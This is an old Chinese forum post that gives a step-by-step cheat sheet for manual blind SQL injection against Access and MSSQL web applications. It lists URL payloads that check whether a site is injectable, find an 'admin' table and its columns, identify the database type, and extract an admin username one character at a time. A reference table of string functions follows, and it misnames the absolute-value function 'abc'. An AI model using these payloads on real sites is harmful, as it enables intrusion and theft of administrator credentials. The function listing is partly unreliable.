热搜词
手工检测可否注入的大致经过
灰儿 管理员 发消息 加好友 打招呼
发表于 2006-9-27 21:56:05 | 显示全部楼层 |阅读模式
<P class=MsoNormal style="MARGIN: 0cm 0cm 0pt; TEXT-ALIGN: center; mso-pagination: widow-orphan" align=center><A name=top><B><SPAN style="FONT-SIZE: 12pt; FONT-FAMILY: 宋体; mso-bidi-font-family: 宋体; mso-font-kerning: 0pt">手工检测可否注入的大致经过</SPAN></B></A><SPAN style="mso-bookmark: top"><SPAN lang=EN-US style="FONT-SIZE: 9pt; FONT-FAMILY: 宋体; mso-bidi-font-family: 宋体; mso-font-kerning: 0pt"><BR></SPAN></SPAN></P><P class=MsoNormal style="MARGIN: 0cm 0cm 0pt; TEXT-ALIGN: left; mso-pagination: widow-orphan" align=left><SPAN lang=EN-US style="FONT-SIZE: 9pt; FONT-FAMILY: 宋体; mso-bidi-font-family: 宋体; mso-font-kerning: 0pt"><BR>□ </SPAN><SPAN style="FONT-SIZE: 9pt; FONT-FAMILY: 宋体; mso-bidi-font-family: 宋体; mso-font-kerning: 0pt">检测可否注入<SPAN lang=EN-US> <BR>============================================================ ================== <BR>http://url/xx?id=1111 and 1=1 (</SPAN>正常页面<SPAN lang=EN-US>) <BR>http://url/xx?id=1111 and 1=2 (</SPAN>出错页面<SPAN lang=EN-US>) <?xml:namespace prefix = o ns = "urn:schemas-microsoft-com:office:office" /><o:p></o:p></SPAN></SPAN></P><P class=MsoNormal style="MARGIN: 0cm 0cm 0pt; TEXT-ALIGN: left; mso-pagination: widow-orphan; mso-margin-top-alt: auto; mso-margin-bottom-alt: auto" align=left><SPAN lang=EN-US style="FONT-SIZE: 9pt; FONT-FAMILY: 宋体; mso-bidi-font-family: 宋体; mso-font-kerning: 0pt">============================================================ ================== <BR>□ </SPAN><SPAN style="FONT-SIZE: 9pt; FONT-FAMILY: 宋体; mso-bidi-font-family: 宋体; mso-font-kerning: 0pt">检测表段的<SPAN lang=EN-US> <BR>============================================================ ================== <BR>http://url/xx?id=1111 and exists (select * from admin) <o:p></o:p></SPAN></SPAN></P><P class=MsoNormal style="MARGIN: 0cm 0cm 0pt; TEXT-ALIGN: left; mso-pagination: widow-orphan; mso-margin-top-alt: auto; mso-margin-bottom-alt: auto" align=left><SPAN lang=EN-US style="FONT-SIZE: 9pt; FONT-FAMILY: 宋体; mso-bidi-font-family: 宋体; mso-font-kerning: 0pt">============================================================ ================== <BR>□ </SPAN><SPAN style="FONT-SIZE: 9pt; FONT-FAMILY: 宋体; mso-bidi-font-family: 宋体; mso-font-kerning: 0pt">检测字段的<SPAN lang=EN-US> <BR>============================================================ ================== <BR>http://url/xx?id=1111 and exists (select username from admin) <o:p></o:p></SPAN></SPAN></P><P class=MsoNormal style="MARGIN: 0cm 0cm 0pt; TEXT-ALIGN: left; mso-pagination: widow-orphan; mso-margin-top-alt: auto; mso-margin-bottom-alt: auto" align=left><SPAN lang=EN-US style="FONT-SIZE: 9pt; FONT-FAMILY: 宋体; mso-bidi-font-family: 宋体; mso-font-kerning: 0pt">============================================================ ================== <BR>□ </SPAN><SPAN style="FONT-SIZE: 9pt; FONT-FAMILY: 宋体; mso-bidi-font-family: 宋体; mso-font-kerning: 0pt">检测<SPAN lang=EN-US>ID <BR>============================================================ ================== <BR>http://url/xx?id=1111 and exists (select id from admin where ID=1) <o:p></o:p></SPAN></SPAN></P><P class=MsoNormal style="MARGIN: 0cm 0cm 0pt; TEXT-ALIGN: left; mso-pagination: widow-orphan; mso-margin-top-alt: auto; mso-margin-bottom-alt: auto" align=left><SPAN lang=EN-US style="FONT-SIZE: 9pt; FONT-FAMILY: 宋体; mso-bidi-font-family: 宋体; mso-font-kerning: 0pt">============================================================ ================== <BR>□ </SPAN><SPAN style="FONT-SIZE: 9pt; FONT-FAMILY: 宋体; mso-bidi-font-family: 宋体; mso-font-kerning: 0pt">检测长度的<SPAN lang=EN-US> <BR>============================================================ ================== <BR>http://url/xx?id=1111 and exists (select id from admin where len(username)=5 and ID=1) <o:p></o:p></SPAN></SPAN></P><P class=MsoNormal style="MARGIN: 0cm 0cm 0pt; TEXT-ALIGN: left; mso-pagination: widow-orphan; mso-margin-top-alt: auto; mso-margin-bottom-alt: auto" align=left><SPAN lang=EN-US style="FONT-SIZE: 9pt; FONT-FAMILY: 宋体; mso-bidi-font-family: 宋体; mso-font-kerning: 0pt">============================================================ ================== <BR>□ </SPAN><SPAN style="FONT-SIZE: 9pt; FONT-FAMILY: 宋体; mso-bidi-font-family: 宋体; mso-font-kerning: 0pt">检测长度的<SPAN lang=EN-US> <BR>============================================================ ================== <BR>http://url/xx?id=1111 and exists (select id from admin where len(username)=5 and ID=1) <o:p></o:p></SPAN></SPAN></P><P class=MsoNormal style="MARGIN: 0cm 0cm 0pt; TEXT-ALIGN: left; mso-pagination: widow-orphan; mso-margin-top-alt: auto; mso-margin-bottom-alt: auto" align=left><SPAN lang=EN-US style="FONT-SIZE: 9pt; FONT-FAMILY: 宋体; mso-bidi-font-family: 宋体; mso-font-kerning: 0pt">============================================================ ================== <BR>□ </SPAN><SPAN style="FONT-SIZE: 9pt; FONT-FAMILY: 宋体; mso-bidi-font-family: 宋体; mso-font-kerning: 0pt">检测是否为<SPAN lang=EN-US>MSSQL</SPAN>数据库<SPAN lang=EN-US> <BR>============================================================ ================== <BR>http://url/xx?id=1111 and exists (select * from sysobjects) <o:p></o:p></SPAN></SPAN></P><P class=MsoNormal style="MARGIN: 0cm 0cm 0pt; TEXT-ALIGN: left; mso-pagination: widow-orphan; mso-margin-top-alt: auto; mso-margin-bottom-alt: auto" align=left><SPAN lang=EN-US style="FONT-SIZE: 9pt; FONT-FAMILY: 宋体; mso-bidi-font-family: 宋体; mso-font-kerning: 0pt">============================================================ ================== <BR>□ </SPAN><SPAN style="FONT-SIZE: 9pt; FONT-FAMILY: 宋体; mso-bidi-font-family: 宋体; mso-font-kerning: 0pt">检测是否为英文<SPAN lang=EN-US> <BR>============================================================ ================== <BR>(ACCESS</SPAN>数据库<SPAN lang=EN-US>) <BR>http://url/xx?id=1111 and exists (select id from admin where asc(mid(username,1,1)) between 30 and 130 and ID=1) <o:p></o:p></SPAN></SPAN></P><P class=MsoNormal style="MARGIN: 0cm 0cm 0pt; TEXT-ALIGN: left; mso-pagination: widow-orphan; mso-margin-top-alt: auto; mso-margin-bottom-alt: auto" align=left><SPAN lang=EN-US style="FONT-SIZE: 9pt; FONT-FAMILY: 宋体; mso-bidi-font-family: 宋体; mso-font-kerning: 0pt">(MSSQL</SPAN><SPAN style="FONT-SIZE: 9pt; FONT-FAMILY: 宋体; mso-bidi-font-family: 宋体; mso-font-kerning: 0pt">数据库<SPAN lang=EN-US>) <BR>http://url/xx?id=1111 and exists (select id from admin where unicode(substring(username,1,1)) between 30 and 130 and ID=1) <o:p></o:p></SPAN></SPAN></P><P class=MsoNormal style="MARGIN: 0cm 0cm 0pt; TEXT-ALIGN: left; mso-pagination: widow-orphan; mso-margin-top-alt: auto; mso-margin-bottom-alt: auto" align=left><SPAN lang=EN-US style="FONT-SIZE: 9pt; FONT-FAMILY: 宋体; mso-bidi-font-family: 宋体; mso-font-kerning: 0pt"><BR>============================================================ ================== <BR>□ </SPAN><SPAN style="FONT-SIZE: 9pt; FONT-FAMILY: 宋体; mso-bidi-font-family: 宋体; mso-font-kerning: 0pt">检测英文的范围<SPAN lang=EN-US> <BR>============================================================ ================== <BR>(ACCESS</SPAN>数据库<SPAN lang=EN-US>) <BR>http://url/xx?id=1111 and exists (select id from admin where asc(mid(username,1,1)) between 90 and 100 and ID=1) <o:p></o:p></SPAN></SPAN></P><P class=MsoNormal style="MARGIN: 0cm 0cm 0pt; TEXT-ALIGN: left; mso-pagination: widow-orphan; mso-margin-top-alt: auto; mso-margin-bottom-alt: auto" align=left><SPAN lang=EN-US style="FONT-SIZE: 9pt; FONT-FAMILY: 宋体; mso-bidi-font-family: 宋体; mso-font-kerning: 0pt">(MSSQL</SPAN><SPAN style="FONT-SIZE: 9pt; FONT-FAMILY: 宋体; mso-bidi-font-family: 宋体; mso-font-kerning: 0pt">数据库<SPAN lang=EN-US>) <BR>http://url/xx?id=1111 and exists (select id from admin where unicode(substring(username,1,1)) between 90 and 100 and ID=1) <o:p></o:p></SPAN></SPAN></P><P class=MsoNormal style="MARGIN: 0cm 0cm 0pt; TEXT-ALIGN: left; mso-pagination: widow-orphan; mso-margin-top-alt: auto; mso-margin-bottom-alt: auto" align=left><SPAN lang=EN-US style="FONT-SIZE: 9pt; FONT-FAMILY: 宋体; mso-bidi-font-family: 宋体; mso-font-kerning: 0pt">============================================================ ================== <BR>□ </SPAN><SPAN style="FONT-SIZE: 9pt; FONT-FAMILY: 宋体; mso-bidi-font-family: 宋体; mso-font-kerning: 0pt">检测那个字符<SPAN lang=EN-US> <BR>============================================================ ================== <BR>(ACCESS</SPAN>数据库<SPAN lang=EN-US>) <BR>http://url/xx?id=1111 and exists (select id from admin where asc(mid(username,1,1))=97 and ID=1) <o:p></o:p></SPAN></SPAN></P><P class=MsoNormal style="MARGIN: 0cm 0cm 0pt; TEXT-ALIGN: left; mso-pagination: widow-orphan; mso-margin-top-alt: auto; mso-margin-bottom-alt: auto" align=left><SPAN lang=EN-US style="FONT-SIZE: 9pt; FONT-FAMILY: 宋体; mso-bidi-font-family: 宋体; mso-font-kerning: 0pt">(MSSQL</SPAN><SPAN style="FONT-SIZE: 9pt; FONT-FAMILY: 宋体; mso-bidi-font-family: 宋体; mso-font-kerning: 0pt">数据库<SPAN lang=EN-US>) <BR>http://url/xx?id=1111 and exists (select id from admin where unicode(substring(username,1,1))=97 and ID=1) <o:p></o:p></SPAN></SPAN></P><P class=MsoNormal style="MARGIN: 0cm 0cm 0pt; TEXT-ALIGN: left; mso-pagination: widow-orphan; mso-margin-top-alt: auto; mso-margin-bottom-alt: auto" align=left><SPAN lang=EN-US style="FONT-SIZE: 9pt; FONT-FAMILY: 宋体; mso-bidi-font-family: 宋体; mso-font-kerning: 0pt">============================================================ =================== <BR></SPAN><SPAN style="FONT-SIZE: 9pt; FONT-FAMILY: 宋体; mso-bidi-font-family: 宋体; mso-font-kerning: 0pt">常用函数 <SPAN lang=EN-US><BR>============================================================ =================== <BR>Access</SPAN>:<SPAN lang=EN-US>asc(</SPAN>字符<SPAN lang=EN-US>)</SPAN> <SPAN lang=EN-US>SQLServer</SPAN>:<SPAN lang=EN-US>unicode(</SPAN>字符<SPAN lang=EN-US>) <BR></SPAN>作用:返回某字符的<SPAN lang=EN-US>ASCII</SPAN>码<SPAN lang=EN-US> <o:p></o:p></SPAN></SPAN></P><P class=MsoNormal style="MARGIN: 0cm 0cm 0pt; TEXT-ALIGN: left; mso-pagination: widow-orphan; mso-margin-top-alt: auto; mso-margin-bottom-alt: auto" align=left><SPAN lang=EN-US style="FONT-SIZE: 9pt; FONT-FAMILY: 宋体; mso-bidi-font-family: 宋体; mso-font-kerning: 0pt">Access</SPAN><SPAN style="FONT-SIZE: 9pt; FONT-FAMILY: 宋体; mso-bidi-font-family: 宋体; mso-font-kerning: 0pt">:<SPAN lang=EN-US>chr(</SPAN>数字<SPAN lang=EN-US>)</SPAN> <SPAN lang=EN-US>SQLServer</SPAN>:<SPAN lang=EN-US>nchar(</SPAN>数字<SPAN lang=EN-US>) <BR></SPAN>作用:与<SPAN lang=EN-US>asc</SPAN>相反,根据<SPAN lang=EN-US>ASCII</SPAN>码返回字符<SPAN lang=EN-US> <o:p></o:p></SPAN></SPAN></P><P class=MsoNormal style="MARGIN: 0cm 0cm 0pt; TEXT-ALIGN: left; mso-pagination: widow-orphan; mso-margin-top-alt: auto; mso-margin-bottom-alt: auto" align=left><SPAN lang=EN-US style="FONT-SIZE: 9pt; FONT-FAMILY: 宋体; mso-bidi-font-family: 宋体; mso-font-kerning: 0pt">Access</SPAN><SPAN style="FONT-SIZE: 9pt; FONT-FAMILY: 宋体; mso-bidi-font-family: 宋体; mso-font-kerning: 0pt">:<SPAN lang=EN-US>mid(</SPAN>字符串<SPAN lang=EN-US>,N,L)</SPAN> <SPAN lang=EN-US>SQLServer</SPAN>:<SPAN lang=EN-US>substring(</SPAN>字符串<SPAN lang=EN-US>,N,L) <BR></SPAN>作用:返回字符串从<SPAN lang=EN-US>N</SPAN>个字符起长度为<SPAN lang=EN-US>L</SPAN>的子字符串,即<SPAN lang=EN-US>N</SPAN>到<SPAN lang=EN-US>N+L</SPAN>之间的字符串<SPAN lang=EN-US> <o:p></o:p></SPAN></SPAN></P><P class=MsoNormal style="MARGIN: 0cm 0cm 0pt; TEXT-ALIGN: left; mso-pagination: widow-orphan; mso-margin-top-alt: auto; mso-margin-bottom-alt: auto" align=left><SPAN lang=EN-US style="FONT-SIZE: 9pt; FONT-FAMILY: 宋体; mso-bidi-font-family: 宋体; mso-font-kerning: 0pt">Access</SPAN><SPAN style="FONT-SIZE: 9pt; FONT-FAMILY: 宋体; mso-bidi-font-family: 宋体; mso-font-kerning: 0pt">:<SPAN lang=EN-US>abc(</SPAN>数字<SPAN lang=EN-US>)</SPAN> <SPAN lang=EN-US>SQLServer</SPAN>:<SPAN lang=EN-US>abc (</SPAN>数字<SPAN lang=EN-US>) <BR></SPAN>作用:返回数字的绝对值(在猜解汉字的时候会用到)<SPAN lang=EN-US> <o:p></o:p></SPAN></SPAN></P><P class=MsoNormal style="MARGIN: 0cm 0cm 12pt; TEXT-ALIGN: left; mso-pagination: widow-orphan; mso-margin-top-alt: auto" align=left><SPAN lang=EN-US style="FONT-SIZE: 9pt; FONT-FAMILY: 宋体; mso-bidi-font-family: 宋体; mso-font-kerning: 0pt">Access</SPAN><SPAN style="FONT-SIZE: 9pt; FONT-FAMILY: 宋体; mso-bidi-font-family: 宋体; mso-font-kerning: 0pt">:<SPAN lang=EN-US>A between B And C</SPAN> <SPAN lang=EN-US>SQLServer</SPAN>:<SPAN lang=EN-US>A between B And C <BR></SPAN>作用:判断<SPAN lang=EN-US>A</SPAN>是否界于<SPAN lang=EN-US>B</SPAN>与<SPAN lang=EN-US>C</SPAN>之间<SPAN lang=EN-US> <BR></SPAN>〈<SPAN lang=EN-US>----</SPAN>〉<SPAN lang=EN-US> <o:p></o:p></SPAN></SPAN></P><P class=MsoNormal style="MARGIN: 0cm 0cm 0pt"><SPAN lang=EN-US><o:p><FONT size=3>&nbsp;</FONT></o:p></SPAN></P>
回复

使用道具 举报

全部评论0
返回列表 发新帖
回复
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 注册

本版积分规则

发布新帖

本文内容不够精彩,我要自己发布

TA的新帖

QQ|Archiver|手机版|小黑屋|管理员之家 ( 苏ICP备2023053177号-2 )

GMT+8, 2024-11-23 01:15 , Processed in 0.170525 second(s), 22 queries .

Powered by Discuz! X3.5

Cpoyright © 2001-2024 Discuz! Team